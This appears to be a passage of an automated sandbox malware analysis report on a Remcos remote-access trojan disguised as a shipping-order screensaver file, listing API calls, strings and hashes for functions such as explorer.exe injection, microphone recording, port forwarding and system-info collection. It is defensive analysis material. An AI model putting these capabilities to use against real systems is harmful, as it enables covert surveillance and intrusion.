                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                      • String ID: <$@$@FG$@FG$Temp
                                                      • API String ID: 1107811701-2245803885
                                                      • Opcode ID: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                      • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                      • Opcode Fuzzy Hash: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                      • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                      Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                      • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe), ref: 00406705
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentProcess
                                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                      • API String ID: 2050909247-4145329354
                                                      • Opcode ID: a25a50d4c2e43c50d9b1e39939b2cfdedfae0b5b41f18b30c59be5b4ed444aac
                                                      • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                      • Opcode Fuzzy Hash: a25a50d4c2e43c50d9b1e39939b2cfdedfae0b5b41f18b30c59be5b4ed444aac
                                                      • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                      Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                      • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                      • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                      • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                      Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00446DDF
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 00446DEB
                                                      • _free.LIBCMT ref: 00446DF6
                                                      • _free.LIBCMT ref: 00446E01
                                                      • _free.LIBCMT ref: 00446E0C
                                                      • _free.LIBCMT ref: 00446E17
                                                      • _free.LIBCMT ref: 00446E22
                                                      • _free.LIBCMT ref: 00446E2D
                                                      • _free.LIBCMT ref: 00446E38
                                                      • _free.LIBCMT ref: 00446E46
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                      • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                      • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                      • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                      Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Eventinet_ntoa
                                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                      • API String ID: 3578746661-4192532303
                                                      • Opcode ID: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                      • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                      • Opcode Fuzzy Hash: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                      • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                      Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                      • API String ID: 3527080286-3064271455
                                                      • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                      • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                      • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                      • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                      Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • Sleep.KERNEL32(00000064), ref: 00416688
                                                      • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateDeleteExecuteShellSleep
                                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                      • API String ID: 1462127192-2001430897
                                                      • Opcode ID: 6f7592da00a282af32ff41b540dad8098d47f26c763fabcb562c03d6f79861a4
                                                      • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                      • Opcode Fuzzy Hash: 6f7592da00a282af32ff41b540dad8098d47f26c763fabcb562c03d6f79861a4
                                                      • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                      Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _strftime.LIBCMT ref: 00401AD3
                                                        • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                      • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                      • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                      • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                      • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                      • API String ID: 3809562944-3643129801
                                                      • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                      • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                      • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                      • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                      Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                      • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                      • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                      • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                      • waveInStart.WINMM ref: 00401A81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                      • String ID: XCG$`=G$x=G
                                                      • API String ID: 1356121797-903574159
                                                      • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                      • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                      • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                      • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                      Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                        • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                        • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                        • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                      • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                      • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                      • TranslateMessage.USER32(?), ref: 0041C9FB
                                                      • DispatchMessageA.USER32(?), ref: 0041CA05
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                      • String ID: Remcos
                                                      • API String ID: 1970332568-165870891
                                                      • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                      • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                      • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                      • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                      Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                      • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                      • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                      • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                      Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                      • __alloca_probe_16.LIBCMT ref: 00452C91
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                      • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                      • __freea.LIBCMT ref: 00452DAA
                                                      • __freea.LIBCMT ref: 00452DB6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 201697637-0
                                                      • Opcode ID: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                      • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                      • Opcode Fuzzy Hash: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                      • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                      Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                      • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                      • _free.LIBCMT ref: 00444714
                                                      • _free.LIBCMT ref: 0044472D
                                                      • _free.LIBCMT ref: 0044475F
                                                      • _free.LIBCMT ref: 00444768
                                                      • _free.LIBCMT ref: 00444774
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                      • String ID: C
                                                      • API String ID: 1679612858-1037565863
                                                      • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                      • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                      • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                      • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                      Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tcp$udp
                                                      • API String ID: 0-3725065008
                                                      • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                      • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                      • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                      • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                      Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExitThread.KERNEL32 ref: 004017F4
                                                        • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                        • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                        • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                      • __Init_thread_footer.LIBCMT ref: 004017BC
                                                        • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                        • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                      • String ID: T=G$p[G$>G$>G
                                                      • API String ID: 1596592924-2461731529
                                                      • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                      • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                      • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                      • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                      Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                        • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                        • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                      • String ID: .part
                                                      • API String ID: 1303771098-3499674018
                                                      • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                      • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                      • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                      • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                      Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                        • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                        • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                        • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                      • _wcslen.LIBCMT ref: 0041A8F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                      • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                      • API String ID: 37874593-703403762
                                                      • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                      • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                      • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                      • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                      Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                      • __alloca_probe_16.LIBCMT ref: 004499E2
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                      • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                      • __freea.LIBCMT ref: 00449B37
                                                        • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      • __freea.LIBCMT ref: 00449B40
                                                      • __freea.LIBCMT ref: 00449B65
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
